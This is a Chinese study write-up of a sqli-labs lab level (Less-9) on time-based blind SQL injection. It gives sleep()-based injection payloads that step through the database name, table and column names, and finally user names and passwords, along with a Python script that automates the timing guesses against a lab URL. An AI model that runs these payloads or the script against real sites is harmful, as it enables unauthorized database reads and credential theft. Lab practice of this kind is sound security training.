Pss-9
这一关考察的是时间盲注
先练习几个常见命令语句:
select sleep(5);--延迟5s输出结果
if (1>0,'ture','false');--输出‘ture’ /if (1<0,'ture','false');--输出‘false’
select ascii('')/select ord('')返回字符串第一个字符的结果
select length(‘hsgfdsg’);--返回字符串长度
select substr/substring/mid('dfgdhd',2,2);--输出fg,无0位
补充知识点:
1、时间盲注:根据页面的响应时间来判断是否存在注入,联合(页面没有回显位置),报错(页面不显示数据库报错信息),布尔(s/f都只显示一种结果)都不行的时候考虑,
2、步骤:
(1)判断注入点:
?id=1 and if(1,sleep(5),3) ?id=1' and if(1,sleep(5),3) ?id=1" and if(1,sleep(5),3)(2)判断长度:
?id=1' and if((length(查询语句) =1), sleep(5), 3)(3)枚举字符
?id=1' and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3)3.时间盲注从网上找的自动化pythony脚本
-
import requests import time # 将url 替换成你的靶场关卡网址 # 修改两个对应的payload # 目标网址(不带参数) url = "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/" # 猜解长度使用的payload payload_len = """?id=1' and if( (length(database()) ={n}) ,sleep(5),3) -- a""" # 枚举字符使用的payload payload_str = """?id=1' and if( (ascii( substr( (database()) ,{n},1) ) ={r}) , sleep(5), 3) -- a""" # 获取长度 def getLength(url, payload): length = 1 # 初始测试长度为1 while True: start_time = time.time() response = requests.get(url= url+payload_len.format(n= length)) # 页面响应时间 = 结束执行的时间 - 开始执行的时间 use_time = time.time() - start_time # 响应时间>5秒时,表示猜解成功 if use_time > 5: print('测试长度完成,长度为:', length,) return length; else: print('正在测试长度:',length) length += 1 # 测试长度递增 # 获取字符 def getStr(url, payload, length): str = '' # 初始表名/库名为空 # 第一层循环,截取每一个字符 for l in range(1, length+1): # 第二层循环,枚举截取字符的每一种可能性 for n in range(33, 126): start_time = time.time() response = requests.get(url= url+payload_str.format(n= l, r= n)) # 页面响应时间 = 结束执行的时间 - 开始执行的时间 use_time = time.time() - start_time # 页面中出现此内容则表示成功 if use_time > 5: str+= chr(n) print('第', l, '个字符猜解成功:', str) break; return str; # 开始猜解 length = getLength(url, payload_len) getStr(url, payload_str, length)
无论输入id=1/id=1'/id-1"全部不报错没回显,考虑时间盲注
先通过时间函数判断闭合点 ,单引号闭合,加载了5s
?id=1' and if((length(database())>8),sleep(5),66)--+到8的时候就不转了,数据库长度为8
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),0)--+?id=1'and if((ascii(substr(database(),1,1))>100),sleep(5),0)--+转了5s,通过这种界定,逐个试,是115,最后得出security
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+用上面这个判断表个数,后面的其实就是变了个函数机理都一样
?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),0)--+ --1
......
?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(5),0)--+ --4判断表长
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),0)--+表名
?id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)--+字段
?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=2,sleep(5),0)--+
?id=1' and if(ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep (5),0)--+
....
?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1))=8,sleep(5),0)--+
?id=1' and if(ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,1))=112,sleep (5),0)--+字段长度,名称
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),1)--+
?id=1' and if(ascii(substr((select password from users limit 0,1),1,1))=68,sleep(5),1)--+得username, password
第10关也是时间盲注
